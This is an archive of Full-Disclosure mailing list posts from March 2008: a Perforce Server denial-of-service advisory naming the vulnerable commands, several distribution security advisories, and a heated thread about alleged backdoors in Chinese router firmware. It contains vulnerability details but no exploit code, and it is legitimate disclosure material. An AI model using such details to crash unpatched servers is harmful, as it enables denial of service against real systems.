### Luigi Auriemma Application: Perforce Server http://www.perforce.com Versions: = 2007.3/143793 Platforms:Windows, Unix, Linux and Mac Bugs: NULL pointers, invalid memory access and endless loop Exploitation: remote Date: 05 Mar 2008 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bugs 3) The Code 4) Fix ### === 1) Introduction === From vendor's website: Perforce SCM (Software Configuration Management) versions and manages source code and digital assets for enterprises large and small. ### === 2) Bugs === The Perforce server is affected by multiple vulnerabilities which allow any unauthenticated attacker to crash the server or consuming all its resources. The first type of vulnerabilities includes the NULL pointers generated by the absence of some parameters in the client's request and the lack of checks on the pointers returned by the functions which get these values from the packets. The commands affected by these NULL pointer vulnerabilities are the following: dm-FaultFile, dm-LazyCheck, dm-ResolvedFile, dm-OpenFile, crypto and possibly others. A secondary type of vulnerabilities is exploitable through the server-DiffFile and server-ReleaseFile commands, in this case the problem is caused by the 32 bit number provided by the client which is used as amount of elements in the initialization of an array. Another problem is then exploitable again with a malformed server-DiffFile command and allows to force the server in an endless loop which will cause its termination after having consumed all the memory and the resources of the system. ### === 3) The Code === http://aluigi.org/poc/perforces.zip ### == 4) Fix == No fix ### --- Luigi Auriemma http://aluigi.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2008:059 ] - Updated tcl packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:059 http://www.mandriva.com/security/ ___ Package : tcl Date: March 5, 2008 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0 ___ Problem Description: A flaw in the Tcl regular expression handling engine was originally discovered by Will Drewry in the PostgreSQL database server's Tcl regular expression engine. This flaw can result in an infinite loop when processing certain regular expressions. The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4772 ___ Updated Packages: Mandriva Linux 2007.0: bde7e57d9dc7d568c0390ba3db4b5a3c 2007.0/i586/libtcl8.4-8.4.13-1.1mdv2007.0.i586.rpm d5a61fcda52e37a15c19e7d5c068656e 2007.0/i586/libtcl8.4-devel-8.4.13-1.1mdv2007.0.i586.rpm b243426d0d7f8d0a10ba70651feaef03 2007.0/i586/tcl-8.4.13-1.1mdv2007.0.i586.rpm 4f287e93256eaf7c84a0448ef2008020 2007.0/SRPMS/tcl-8.4.13-1.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: fa6beda37d3eaf2200e3b30af08751e9 2007.0/x86_64/lib64tcl8.4-8.4.13-1.1mdv2007.0.x86_64.rpm 46aa8b711feb915543ae2191da82bd01 2007.0/x86_64/lib64tcl8.4-devel-8.4.13-1.1mdv2007.0.x86_64.rpm 105fc5f39986cc6db6b4adb068baf425 2007.0/x86_64/tcl-8.4.13-1.1mdv2007.0.x86_64.rpm 4f287e93256eaf7c84a0448ef2008020 2007.0/SRPMS/tcl-8.4.13-1.1mdv2007.0.src.rpm Mandriva Linux 2007.1: 5d5648b2bb457b157e1c30329f9891c7 2007.1/i586/libtcl8.4-8.4.14-1.1mdv2007.1.i586.rpm a98f64c60b59d32e54baf01275c85cbf 2007.1/i586/libtcl8.4-devel-8.4.14-1.1mdv2007.1.i586.rpm 62b8899728974799108afe5a5c39b34a 2007.1/i586/tcl-8.4.14-1.1mdv2007.1.i586.rpm 569e9de9c684040893255a5800b49037 2007.1/SRPMS/tcl-8.4.14-1.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 817d49b898cc17e360141894c922e6cd 2007.1/x86_64/lib64tcl8.4-8.4.14-1.1mdv2007.1.x86_64.rpm 4b277a29b3c41b37010e7c10f9644f7f 2007.1/x86_64/lib64tcl8.4-devel-8.4.14-1.1mdv2007.1.x86_64.rpm 70bbb7e664ec0fd8636faf6734e205a3 2007.1/x86_64/tcl-8.4.14-1.1mdv2007.1.x86_64.rpm 569e9de9c684040893255a5800b49037 2007.1/SRPMS/tcl-8.4.14-1.1mdv2007.1.src.rpm Mandriva Linux 2008.0: b474df935ae9405261886dc3983876e7 2008.0/i586/libtcl-devel-8.5a6-4.1mdv2008.0.i586.rpm 6e675eb728a9e61b139b1084fd451298 2008.0/i586/libtcl8.5-8.5a6-4.1mdv2008.0.i586.rpm 50111e483a4d70a7522038532f583e7d 2008.0/i586/tcl-8.5a6-4.1mdv2008.0.i586.rpm 42741c6d8cd19fb3907ceb97d934a6f6 2008.0/SRPMS/tcl-8.5a6-4.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 72982af24a4ed7c44ec46f8f4b593dee 2008.0/x86_64/lib64tcl-devel-8.5a6-4.1mdv2008.0.x86_64.rpm 3acb0a9ebc9aab51b6ff23d316721518 2008.0/x86_64/lib64tcl8.5-8.5a6-4.1mdv2008.0.x86_64.rpm 35a0827df193416c3ea6400309b4ae30 2008.0/x86_64/tcl-8.5a6-4.1mdv2008.0.x86_64.rpm 42741c6d8cd19fb3907ceb97d934a6f6 2008.0/SRPMS/tcl-8.5a6-4.1mdv2008.0.src.rpm Corporate 3.0: 45c8fbd95bebbad1b23f8bb2b15abe31 corporate/3.0/i586/expect-8.4.5-3.3.C30mdk.i586.rpm a45706ad62f18aa9a9ee532ece27349f corporate/3.0/i586/itcl-8.4.5-3.3.C30mdk.i586.rpm f448c6df20f64d967bf51cfc89139c61 corporate/3.0/i586/tcl-8.4.5-3.3.C30mdk.i586.rpm 508f120b23e7de9f91e68b6416360c57 corporate/3.0/i586/tcllib-8.4.5-3.3.C30mdk.i586.rpm 78a9d355932b0584734f927bf0bd21cb corporate/3.0/i586/tclx-8.4.5-3.3.C30mdk.i586.rpm dc15072dc76732f54e7effc67aa506e9 corporate/3.0/i586/tix-8.4.5-3.3.C30mdk.i586.rpm 1ad401d437998a447f8767eac0ed3f64 corporate/3.0/i586/tk-8.4.5-3.3.C30mdk.i586.rpm aca59d9916edfbf607b42a089c4e51f5 corporate/3.0/SRPMS/tcltk-8.4.5-3.3.C30mdk.src.rpm Corporate 3.0/X86_64: ab9dcf95b516f63779a48fa5da217e2c corporate/3.0/x86_64/expect-8.4.5-3.3.C30mdk.x86_64.rpm ccf0b17e73baed1a5597698501d4e16c corporate/3.0/x86_64/itcl-8.4.5-3.3.C30mdk.x86_64.rpm 7004fe82ceadb690a1c537dfffa8a602 corporate/3.0/x86_64/tcl-8.4.5-3.3.C30mdk.x86_64.rpm 8082288dd36eefe4f59f288636d86f52 corporate/3.0/x86_64/tcllib-8.4.5-3.3.C30mdk.x86_64.rpm 0d535ba37b8521ba2aed9ef62597b91f corporate/3.0/x86_64/tclx-8.4.5-3.3.C30mdk.x86_64.rpm 8eb5591457bdac01a6ebd5946bedbae2 corporate/3.0/x86_64/tix-8.4.5-3.3.C30mdk.x86_64.rpm 73d05959408f8daba243008033d1214c corporate/3.0/x86_64/tk-8.4.5-3.3.C30mdk.x86_64.rpm aca59d9916edfbf607b42a089c4e51f5 corporate/3.0/SRPMS/tcltk-8.4.5-3.3.C30mdk.src.rpm Corporate 4.0: 5a24c2fa2c3ef75bf5a6a9c8e8d9fde4 corporate/4.0/i586/expect-8.4.11-1.3.20060mlcs4.i586.rpm 2f76f932af5019692972d3fe8cbe942b corporate/4.0/i586/itcl-8.4.11-1.3.20060mlcs4.i586.rpm
[Full-disclosure] [ GLSA 200803-11 ] Vobcopy: Insecure temporary file creation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Vobcopy: Insecure temporary file creation Date: March 05, 2008 Bugs: #197578 ID: 200803-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Vobcopy uses temporary files in an insecure manner, allowing for a symlink attack. Background == Vobcopy is a tool for decrypting and copying DVD .vob files to a hard disk. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-video/vobcopy1.1.0= 1.1.0 Description === Joey Hess reported that vobcopy appends data to the file /tmp/vobcopy.bla in an insecure manner. Impact == A local attacker could exploit this vulnerability to conduct symlink attacks and append data to arbitrary files with the privileges of the user running Vobcopy. Workaround == There is no known workaround at this time. Resolution == All Vobcopy users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-video/vobcopy-1.1.0 References == [ 1 ] CVE-2007-5718 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5718 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-11.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzyOzuhJ+ozIKI5gRAsIRAJ96E0AKomLaheEMTTVpXv/sOxU77QCeORsz STMU3XJAKjrHur+Tihd5ZFU= =gtMw -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200803-12 ] Evolution: Format string vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Evolution: Format string vulnerability Date: March 05, 2008 Bugs: #212272 ID: 200803-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A format string error has been discovered in Evolution, possibly resulting in the execution of arbitrary code. Background == Evolution is a GNOME groupware application. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 mail-client/evolution 2.12.3-r1 = 2.12.3-r1 Description === Ulf Harnhammar from Secunia Research discovered a format string error in the emf_multipart_encrypted() function in the file mail/em-format.c when reading certain data (e.g. the Version: field) from an encrypted e-mail. Impact == A remote attacker could entice a user to open a specially crafted encrypted e-mail, potentially resulting in the execution of arbitrary code with the privileges of the user running Evolution. Workaround == There is no known workaround at this time. Resolution == All Evolution users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =mail-client/evolution-2.12.3-r1 References == [ 1 ] CVE-2008-0072 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0072 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-12.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzyY3uhJ+ozIKI5gRAlYJAJ0bS23P4HSxo13IpHXm89eYBg5CkQCggvwY UdMbR+mlmHFpuPT+wFmZIMw= =cJHw -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2008:060 ] - Updated Joomla! packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:060 http://www.mandriva.com/security/ ___ Package : joomla Date: March 5, 2008 Affected: 2007.0, 2007.1, 2008.0 ___ Problem Description: Several severe security issues were discovered in the Joomla! PHP-based content management system. These issues have been fixed in version 1.0.15 which is provided with this update. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6642 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6643 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6644 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6645 ___ Updated Packages: Mandriva Linux 2007.0: 5f0adf1ca84dfa5252ca1a82ab865a75 2007.0/i586/joomla-1.0.15-0.1mdv2007.0.noarch.rpm f794badb8ac18137990f401eea61fcd5 2007.0/i586/joomla-administrator-1.0.15-0.1mdv2007.0.noarch.rpm ebd92dea41fbfe31328aa60b876e3d78 2007.0/SRPMS/joomla-1.0.15-0.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: c4dfb0c218ecd4677db7cb73c2de1f14 2007.0/x86_64/joomla-1.0.15-0.1mdv2007.0.noarch.rpm 23d52be38d17120cde974adab8375d86 2007.0/x86_64/joomla-administrator-1.0.15-0.1mdv2007.0.noarch.rpm ebd92dea41fbfe31328aa60b876e3d78 2007.0/SRPMS/joomla-1.0.15-0.1mdv2007.0.src.rpm Mandriva Linux 2007.1: 19a42a1369674164538db858af9405ff 2007.1/i586/joomla-1.0.15-0.1mdv2007.1.noarch.rpm 55525938eabff027c19bdd233cfc5bde 2007.1/i586/joomla-administrator-1.0.15-0.1mdv2007.1.noarch.rpm 4be5e56dec84c4d0f34c8363b68e68a3 2007.1/SRPMS/joomla-1.0.15-0.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 7d78e93c570396f2db0ebc12e9201dc5 2007.1/x86_64/joomla-1.0.15-0.1mdv2007.1.noarch.rpm c4854df8790fc8eabe4b0024e72f174a 2007.1/x86_64/joomla-administrator-1.0.15-0.1mdv2007.1.noarch.rpm 4be5e56dec84c4d0f34c8363b68e68a3 2007.1/SRPMS/joomla-1.0.15-0.1mdv2007.1.src.rpm Mandriva Linux 2008.0: fa7eb9a56f6b0b3d7e143e467baf181e 2008.0/i586/joomla-1.0.15-0.1mdv2008.0.noarch.rpm ec3fb80329c9a2c7bd14af9a39a8ed8e 2008.0/i586/joomla-administrator-1.0.15-0.1mdv2008.0.noarch.rpm 1c09f30544ae0ddcfad1b19eaab5400d 2008.0/SRPMS/joomla-1.0.15-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 9c05dd8c7fdc9c9c31490b40594c0c74 2008.0/x86_64/joomla-1.0.15-0.1mdv2008.0.noarch.rpm 1bffce8962d7208a28af7bbcc6380d96 2008.0/x86_64/joomla-administrator-1.0.15-0.1mdv2008.0.noarch.rpm 1c09f30544ae0ddcfad1b19eaab5400d 2008.0/SRPMS/joomla-1.0.15-0.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFHzvqImqjQ0CJFipgRAjvlAJwIKwHr0x5/6wiPTmK3B0r7Iob4eQCbB66Z eFHu6uuC341v9eOjiKx+Vyg= =xIQy -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Chinese backdoors hidden in router firmware
http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-584-1] OpenLDAP vulnerabilities
=== Ubuntu Security Notice USN-584-1 March 05, 2008 openldap2.2, openldap2.3 vulnerabilities CVE-2007-6698, CVE-2008-0658 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: slapd 2.2.26-5ubuntu2.6 Ubuntu 6.10: slapd 2.2.26-5ubuntu3.3 Ubuntu 7.04: slapd 2.3.30-2ubuntu0.2 Ubuntu 7.10: slapd 2.3.35-1ubuntu0.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Jonathan Clarke discovered that the OpenLDAP slapd server did not properly handle modify requests when using the Berkeley DB backend and the NOOP control was used. An authenticated user with modify permissions could send a crafted modify request and cause a denial of service via application crash. Ubuntu 7.10 is not affected by this issue. (CVE-2007-6698) Ralf Haferkamp discovered that the OpenLDAP slapd server did not properly handle modrdn requests when using the Berkeley DB backend and the NOOP control was used. An authenticated user with modrdn permissions could send a crafted modrdn request and possibly cause a denial of service via application crash. (CVE-2007-6698) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu2.6.diff.gz Size/MD5: 513643 5ec2226be9a7a7ed4b08c8c129943979 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu2.6.dsc Size/MD5: 1020 fa23dada98476932fb1e8c1e6d47a143 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26.orig.tar.gz Size/MD5: 2626629 afc8700b5738da863b30208e1d3e9de8 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.6_amd64.deb Size/MD5: 130552 9e5d6589617f2c98632b8c7c5a4f2afc http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.6_amd64.deb Size/MD5: 165976 68032a07f814ef62556b539b17531161 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.6_amd64.deb Size/MD5: 961572 6074803431925962b7500f1223ecba0e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.6_i386.deb Size/MD5: 118396 b8864fd7cb61e88cf5bd15ed5c87ce38 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.6_i386.deb Size/MD5: 146100 27c057986763be36fd3b267ba1844bb2 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.6_i386.deb Size/MD5: 873016 c392b5a10d1973fe2d6c264d496a0424 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.6_powerpc.deb Size/MD5: 132736 a21157c2d376e3b4cdd7fdb2e3b97a2e http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.6_powerpc.deb Size/MD5: 157168 a935b8931a79ec692fa3d10357feb811 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.6_powerpc.deb Size/MD5: 959554 bd801628bccfdc5624d9386d0fb6c2d1 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.6_sparc.deb Size/MD5: 120696 8efb65196a17efc1b397cadc874eb201 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.6_sparc.deb Size/MD5: 148180 83781a94080002f4363d2fd557cec845 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.6_sparc.deb Size/MD5: 903560 0ed257e45f1ae749cb3a0b4591328db4 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu3.3.diff.gz Size/MD5: 514824 2e3cf6b4dbcfc951d00875df98394a0e http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu3.3.dsc Size/MD5: 1020 4cb25054b1a571a1c228d06b6fa8872a http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26.orig.tar.gz Size/MD5: 2626629 afc8700b5738da863b30208e1d3e9de8 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu3.3_amd64.deb Size/MD5: 130748 cec7e5a6bbd103d02f59b171e6d3cc62
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
On Wed, Mar 5, 2008 at 3:09 PM, Ivan . [EMAIL PROTECTED] wrote: http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html they also pwned my toothpaste and gave me diarrhea :( :( :( H A C K E D B Y C H I N E S E, LOLOLOLOLOL titan rain is dark comedy at its finest! (( how many orgs / govs actually do due diligence and audit third party hardware / software / systems they purchase ?? )) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
wouldn't be the first time that National intelligence agencies have comprised IT gear http://en.wikipedia.org/wiki/Crypto_AG On Thu, Mar 6, 2008 at 10:51 AM, coderman [EMAIL PROTECTED] wrote: On Wed, Mar 5, 2008 at 3:09 PM, Ivan . [EMAIL PROTECTED] wrote: http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html they also pwned my toothpaste and gave me diarrhea :( :( :( H A C K E D B Y C H I N E S E, LOLOLOLOLOL titan rain is dark comedy at its finest! (( how many orgs / govs actually do due diligence and audit third party hardware / software / systems they purchase ?? )) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
On Wed, Mar 5, 2008 at 4:07 PM, Ivan . [EMAIL PROTECTED] wrote: wouldn't be the first time that National intelligence agencies have comprised IT gear true; i just meant that an elaborate back door isn't even necessary when the front door lock can be bumped open (titan rain :) the athens affair is another fun example of the folly of running arbitrary and un tested / audited code on your infrastructure... http://spectrum.ieee.org/print/5280 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
On Wed, Mar 5, 2008 at 11:51 PM, coderman [EMAIL PROTECTED] wrote: On Wed, Mar 5, 2008 at 3:09 PM, Ivan . [EMAIL PROTECTED] wrote: http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html they also pwned my toothpaste and gave me diarrhea :( :( :( H A C K E D B Y C H I N E S E, LOLOLOLOLOL titan rain is dark comedy at its finest! (( how many orgs / govs actually do due diligence and audit third party hardware / software / systems they purchase ?? )) shut up coderman, this is actually a serious subject. there was even a .mil report about it that i spammed to the list a not long back :) no one paid attention though: http://www.thetrumpet.com/index.php?q=4524.2780.0.0 http://www.govexec.com/story_page.cfm?articleid=38713dcn=todaysnews this is actually a serious subject i wanted securityfocus to cover but they ignored my e-mails! i also contacted cnet news at the time and they ignored my e-mails. pay attention to the security community next time! we're telling you things we want you to put in your news articles to send signals to the government but you ignore us. what's the point of this mailing list being here if the media won't work with the underground to send messages to the high ups in our corrupt governments? fuck the media! :) http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/058845.html http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/058850.html Date: Wed, 5 Dec 2007 08:33:09 + From: n3td3v [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED], Subject: Fwd: Report: Foreign Countries Develop U.S. Defense Systems Software Please can you publish this, America deserves to know how stupid Bush admin are. OK, we already knew how stupid they are, but please publish this cnet and securityfocus editors, its time to get the Bush admin and MI5 back for spewing all that anti-China propaganda to the media recently. Bush admin and MI5 are a bunch of incompetent bastards putting our national security at risk, how dare they put national security at risk by out sourcing its .mil software to the number 1 cyber enemy, CHINA. The truth comes out in the end!!! Its too LOL to be true. PUBLISH PUBLISH PUBLISH!!! The American people deserve to know the truth!! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
Typical media dramatization. No where in the article does it state that backdoors HAVE been found in router firmwares. Next we'll be seeing Japanese tactical nukes Hidden in Toyota trunks On Thu, Mar 6, 2008 at 10:09 AM, Ivan . [EMAIL PROTECTED] wrote: http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
Next we'll be seeing Japanese tactical nukes Hidden in Toyota trunks And who knows what the French are putting in that cheese. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ http://blogs.pcmag.com/securitywatch/ http://blogs.pcmag.com/securitywatch/Contributing Contributing Editor, PC Magazine [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Greets. It does not matter so much if there is no hard proof about the router firmware containing backdoors set in place by Chinese manufacturers. ~From a security perspective, it is a potential threat which should be addressed, especially for western networks and those they trust. It is not too far fetched of an idea. Google yielded the following fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml If you want to be inundated with reading material on the matter, be creative, or not too creative, with Google searches having to do with China and western powers and businesses, specific to information warfare. .te Larry Seltzer wrote: | Next we'll be seeing Japanese tactical nukes Hidden in Toyota | trunks | | And who knows what the French are putting in that cheese. | Larry Seltzer | eWEEK.com Security Center Editor | http://security.eweek.com/ http://security.eweek.com/ | http://blogs.pcmag.com/securitywatch/ | http://blogs.pcmag.com/securitywatch/ | http://blogs.pcmag.com/securitywatch/Contributing | Contributing Editor, PC Magazine | [EMAIL PROTECTED] | | | | | | | ___ | Full-Disclosure - We believe in it. | Charter: http://lists.grok.org.uk/full-disclosure-charter.html | Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkfPTUAACgkQVuM8PD1UnspxGwCfWA2YAcAk31lPkOeFUkOZm4ko a64AniF5C+KgjpfrAuxEkkW45BM+xpGZ =RwKm -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
there is also the case of fake Cisco routers etc doing the rounds. Whether these devices are back doored is anyones guess http://news.zdnet.co.uk/communications/0,100085,39284348,00.htm http://www.voipforyourbusiness.com/index.php?option=com_contenttask=viewid=115Itemid=1 On Thu, Mar 6, 2008 at 12:47 PM, Times Enemy [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Greets. It does not matter so much if there is no hard proof about the router firmware containing backdoors set in place by Chinese manufacturers. ~From a security perspective, it is a potential threat which should be addressed, especially for western networks and those they trust. It is not too far fetched of an idea. Google yielded the following fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml If you want to be inundated with reading material on the matter, be creative, or not too creative, with Google searches having to do with China and western powers and businesses, specific to information warfare. .te Larry Seltzer wrote: | Next we'll be seeing Japanese tactical nukes Hidden in Toyota | trunks | | And who knows what the French are putting in that cheese. | Larry Seltzer | eWEEK.com Security Center Editor | http://security.eweek.com/ http://security.eweek.com/ | http://blogs.pcmag.com/securitywatch/ | http://blogs.pcmag.com/securitywatch/ | http://blogs.pcmag.com/securitywatch/Contributing | Contributing Editor, PC Magazine | [EMAIL PROTECTED] | | | | | | | ___ | Full-Disclosure - We believe in it. | Charter: http://lists.grok.org.uk/full-disclosure-charter.html | Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkfPTUAACgkQVuM8PD1UnspxGwCfWA2YAcAk31lPkOeFUkOZm4ko 